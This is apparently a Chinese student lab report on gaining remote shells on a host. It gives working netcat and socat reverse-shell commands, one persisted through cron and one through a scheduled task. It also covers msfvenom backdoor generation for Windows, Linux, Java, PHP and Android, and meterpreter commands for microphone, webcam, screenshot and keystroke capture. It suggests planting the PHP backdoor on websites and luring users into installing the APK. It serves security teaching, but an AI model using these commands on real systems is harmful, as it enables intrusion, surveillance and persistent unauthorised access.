任務一:使用netcat獲取主機操做Shell,cron啓動 (0.5分)php
任務二:使用socat獲取主機操做Shell, 任務計劃啓動 (0.5分)html
任務三:使用MSF meterpreter(或其餘軟件)生成可執行文件,利用ncat或socat傳送到主機並運行獲取主機Shell(0.5分)java
任務四:使用MSF meterpreter(或其餘軟件)生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容,並嘗試提權 (2分)linux
返回目錄android
一、在Windows下使用ipconfig
查看本機IP:git
二、使用ncat.exe程序監聽本機的5303端口:web
三、在Kali環境下,使用nc
指令的-e
選項反向鏈接Windows主機的5303
端口:shell
四、成功得到Kali的shell,以下圖所示:編程
一、在Kali環境中使用ifconfig
查看IP:windows
二、使用nc
指令監聽5303
端口:
三、在Windows下,使用ncat.exe
程序的-e
選項項反向鏈接Kali主機的5303
端口:
四、Kali下能夠看到Windows的命令提示,能夠輸入Windows命令:
一、Windows下監聽5303
端口:
二、Kali下鏈接到Windows的5303
端口:
三、創建鏈接以後,就能夠傳輸數據了:
一、在Windows系統下,監聽5303
端口:
二、用crontab -e
指令編輯一條定時任務
三、在最後一行添加45 * * * * /bin/netcat 172.16.8.28 5303 -e /bin/sh
,意思是在每一個小時的第45分鐘反向鏈接Windows主機的5303
端口:
四、當時間到了17點45時,此時已經得到了Kali的shell,能夠輸入指令:
socat
是ncat
的加強版,它使用的格式是socat [options] <address> <address>
,其中兩個address是必選項,而options 是可選項。一、在win10系統下,右擊屏幕左下角windows圖標,選擇「計算機管理」。
在任務計劃程序建立任務,填寫任務名稱,並新建一個觸發器。
二、在操做->程序或腳本中選擇你的socat.exe
文件的路徑,在添加參數一欄填寫tcp-listen:5303 exec:cmd.exe,pty,stderr
,這個命令的做用是把cmd.exe
綁定到端口5303
,同時把cmd.exe
的stderr
重定向到stdout
上:
三、建立完成以後,按Windows+L快捷鍵鎖定計算機,再次打開時,能夠發現以前建立的任務已經開始運行:
四、此時,在Kali環境下輸入指令socat - tcp:172.30.4.253:5303,這裏的第一個參數-表明標準的輸入輸出,第二個流鏈接到Windows主機的5215端口,此時能夠發現已經成功得到了一個cmd shell:
一、輸入指令
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.30.4.253 LPORT=5303 -f exe > 20155303_backdoor.exe
生成後門程序:
二、經過nc指令將生成的後門程序傳送到Windows主機上:
三、在Kali上使用msfconsole指令進入msf控制檯,使用監聽模塊,設置payload,設置反彈回連的IP和端口:
四、設置完成後,執行監聽:
五、運行Windows下的後門程序:
六、此時Kali上已經得到了Windows主機的鏈接,而且獲得了遠程控制的shell:
一、使用record_mic
指令能夠截獲一段音頻:
二、使用webcam_snap
指令可使用攝像頭進行拍照:
效果以下:
三、使用screenshot
指令能夠進行截屏:
效果以下:
四、使用keyscan_start
指令開始記錄下擊鍵的過程,使用keyscan_dump
指令讀取擊鍵的記錄:
Metasploit能夠生成各類格式的後門。除了本次實驗生成的exe(Windows下的後門),還有Linux環境下的後門、PHP後門、java後門、Android後門,以及shellcode等等。具體如何生成各類類型的後門呢?
一、 Linux下的後門:操做方法與Windows後門相似,輸入msfvenom -p linux/x86/shell_reverse_tcp LHOST=172.30.4.253 LPORT=5303 x> 20155303_backdoor
生成木馬。
與windows系統惟一的區別是,在linux下生成的木馬須要經過使用命令chmod +x 程序名
賦予可執行的權限。
執行時使用./程序名
便可。
二、生成Java後門程序:Java程序在windows下和在linux下均可以生效執行。使用msfvenom -p java/meterpreter/reverse_tcp lhost=172.30.4.253 lport=5303 x> 20155303_backdoor.jar
生成木馬。
三、生成PHP後門程序:使用msfvenom -p php/meterpreter/reverse_tcp lhost=172.30.4.253 lport=5303 x> 20155303_backdoor.php
生成木馬。
把生成的木馬php文件放到網站上面,當別人訪問的時候就會執行。
四、生成Android後門程序:使用msfvenom -p android/meterpreter/reverse_tcp lhost=172.30.4.253 lport=5303 x> 20155303_backdoor.apk
生成木馬。
此時的木馬是apk安裝包形式,誘導用戶點擊此安裝包,就會執行。
五、生成shellcode:使用msfvenom -pwindows/meterpreter/reverse_http lhost=172.30.4.253 lport=5303 -f c
生成一段shellcode。
將此shellcode寫入可執行文件,執行時就會回連攻擊機。